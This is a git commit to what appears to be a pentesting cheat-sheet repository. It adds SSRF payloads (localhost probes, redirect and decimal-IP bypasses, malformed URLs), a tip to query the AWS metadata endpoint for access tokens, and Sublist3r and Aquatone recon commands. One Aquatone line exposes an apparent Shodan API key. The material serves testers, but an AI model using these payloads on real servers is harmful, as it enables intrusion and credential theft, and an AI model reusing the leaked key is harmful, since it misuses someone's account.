SSRF updates and methodology aquatone tool

patch-1
Swissky 2017-06-17 23:20:24 +02:00
parent 7c865ab8aa
commit f131aebce4
3 changed files with 68 additions and 18 deletions

View File

@ -48,3 +48,7 @@ List of the top Alexa 100,000 sites with permutations on the TLD and www. For ex
* https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets
* https://digi.ninja/projects/bucket_finder.php
* [Bug Bounty Survey - AWS Basic test](https://twitter.com/bugbsurveys/status/859389553211297792)
This is one of my favorite tricks. More and more companies host part of their infrastructure on Amazon EC2. Amazon exposes an internal service every EC2 instance can query for instance metadata about the host. Heres the AWS documentation. If you found an SSRF vulnerability that runs on EC2, try requesting http://169.254.169.254/latest/meta-data/. This will return a lot of useful information for you to understand the infrastructure and may reveal Amazon S3 access tokens, API tokens, and more. You may also want to download http://169.254.169.254/latest/user-data/ and unzip the data.

View File

@ -44,6 +44,42 @@ git clone https://github.com/ChrisTruncer/EyeWitness.git
./EyeWitness -f rdp.txt --rdp
```
* Using Sublist3r
```bash
To enumerate subdomains of specific domain and show the results in realtime:
python sublist3r.py -v -d example.com
To enumerate subdomains and enable the bruteforce module:
python sublist3r.py -b -d example.com
To enumerate subdomains and use specific engines such Google, Yahoo and Virustotal engines
python sublist3r.py -e google,yahoo,virustotal -d example.com
python sublist3r.py -b -d example.com
```
* Using Aquatone
```
gem install aquatone
Discover subdomains : results in ~/aquatone/example.com/hosts.txt
aquatone-discover --domain example.com
aquatone-discover --domain example.com --threads 25
aquatone-discover --domain example.com --sleep 5 --jitter 30
aquatone-discover --set-key shodan o1hyw8pv59vSVjrZU3Qaz6ZQqgM91ihQ
Active scans : results in ~/aquatone/example.com/urls.txt
aquatone-scan --domain example.com
aquatone-scan --domain example.com --ports 80,443,3000,8080
aquatone-scan --domain example.com --ports large
aquatone-scan --domain example.com --threads 25
Final results
aquatone-gather --domain example.com
```
## Passive recon
* Using Shodan (https://www.shodan.io/) to detect similar app
@ -186,20 +222,6 @@ More subdomain :
gobuster -w wordlist -u URL -r -e
```
* Using Sublist3r
```bash
To enumerate subdomains of specific domain and show the results in realtime:
python sublist3r.py -v -d example.com
To enumerate subdomains and enable the bruteforce module:
python sublist3r.py -b -d example.com
To enumerate subdomains and use specific engines such Google, Yahoo and Virustotal engines
python sublist3r.py -e google,yahoo,virustotal -d example.com
python sublist3r.py -b -d example.com
```
* Using a script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois)
```bash
#!/bin/bash

View File

@ -1,5 +1,5 @@
# Server-Side Request Forgery
Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on behalf of him.
# Server-Side Request Forgery
Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on behalf of him.
## Exploit
@ -17,6 +17,21 @@ http://localhost:443
http://localhost:22
```
Advanced exploit using a redirection
```
1. Create a subdomain pointing to 192.168.0.1 with DNS A record e.g:ssrf.example.com
2. Launch the SSRF: vulnerable.com/index.php?url=http://YOUR_SERVER_IP
vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1
```
Advanced exploit using type=url
```
Change "type=file" to "type=url"
Paste URL in text field and hit enter
Using this vulnerability users can upload images from any image URL = trigger an SSRF
```
## Bypassing
Bypass localhost with [::]
```
http://[::]:80/
@ -30,9 +45,18 @@ Bypass localhost with a domain redirecting to locahost
http://n-pn.info
```
-> 11211
Bypass using a decimal ip location
```
http://2130706433/ = http://127.0.0.1
http://3232235521/ = http://192.168.0.1
http://3232235777/ = http://192.168.1.1
```
Bypass using malformed urls
```
localhost:+11211aaa
localhost:00011211aaaa
```
## Thanks to
*
* [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)